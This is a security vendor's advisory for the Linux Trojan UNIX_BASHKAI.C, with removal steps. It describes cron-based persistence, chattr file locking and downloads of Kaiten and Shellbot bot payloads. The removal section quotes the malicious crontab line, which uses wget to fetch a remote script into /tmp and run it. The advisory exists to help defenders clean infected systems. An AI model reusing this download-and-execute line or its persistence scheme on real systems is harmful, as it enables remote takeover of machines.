UNIX_BASHKAI.C
Windows
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
Dropped by other malware, Downloaded from the Internet
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
Varies
Script
No
13 Oct 2014
Connects to URLs/IPs, Downloads files, Drops files
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
NOTES:
It drops the file /etc/cron.weekly/00logrotate to download from http://{BLOCKED}host.us/bots/regular.bot and save to /tmp/sh, execute and delete the downloaded /tmp/sh.
It schedules the weekly download and execution of http://{BLOCKED}host.us/bots/regular.bot by appending it to the cron table.
It sets the read-only attribute of the files /etc/init.d/ssh, /etc/cron.weekly/00logrotate, /etc/init.d/rc, /usr/bin/crontab, /var/spool/cron/crontabs/root.
It creates a copy of /usr/bin/chattr to /usr/bin/chattr. It removes all permissions from /usr/bin/chattr and sets its read-only attribute.
The downloaded file /tmp/sh from http://{BLOCKED}host.us/bots/regular.bot , also detected by Trend Micro as UNIX_BASHKAI.C, downloads from the following URLs:
- http://{BLOCKED}host.us/manual/a.c (saved as /tmp/a.c) - detected by Trend Micro as TROJ_KAITEN.A
- http://{BLOCKED}host.us/manual/pb (saved as /tmp/p) - detected by Trend Micro as PERL_SHELLBOT.SM
- http://{BLOCKED}host.us/manual/b (saved as /tmp/b) - detected by Trend Micro as ELF_KAITEN.SM
- http://{BLOCKED}host.us/bots/persist (saved as /tmp/malware.must.live) - also detected by Trend Micro as UNIX_BASHKAI.C
Using the installed GNU compiler, it compiles /tmp/a.c to /tmp/kjournald.
It executes the compiled file /tmp/kjournald and the downloaded files /tmp/p, /tmp/b, and /tmp/malware.must.live and deletes them afterwards.
The downloaded file /tmp/malware.must.live is the same as the downloader of http://{BLOCKED}host.us/bots/regular.bot with the exception of that it deletes /usr/bin/chattr. before terminating.
SOLUTION
9.700
11.208.06
13 Oct 2014
Step 1
Remove malware/grayware files dropped/downloaded by UNIX_BASHKAI.C. (Note: Please skip this step if the threats listed below have already been removed.)
- ELF_KAITEN.SM
- PERL_SHELLBOT.SM
- TROJ_KAITEN.A
Step 2
Scan your computer with your Trend Micro product to delete files detected as UNIX_BASHKAI.C. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
NOTES:
In the system's terminal, type the following commands:
chattr -isa /etc/cron.weekly/00logrotate
chattr -isa /etc/init.d/rc
chattr -isa /etc/init.d/ssh
chattr -isa /usr/bin/crontab
chattr -isa /var/spool/cron/crontabs/root
chmod 755 /usr/bin/chattr
rm /etc/cron.weekly/00logrotate
rm /tmp/kjournald
To remove the crontab autostart entry, export the current crontab to a temporary file by typing the following command in the system's terminal:
crontab -l /tmp/cron.tmp
Using a text editor, edit the temporary file /tmp/cron.tmp to remove the following line(replaced {BLOCKED} with "stable"):
@weekly wget -q http://{BLOCKED}host.us/bots/regular.bot -O /tmp/sh sh /tmp/sh;rm -rf /tmp/sh /dev/null 2 1
Type the following commands to remove the cron autostart entry and to delete the temporary file:
crontab /tmp/cron.tmp
rm /tmp/cron.tmp
Did this description help? Tell us how we did.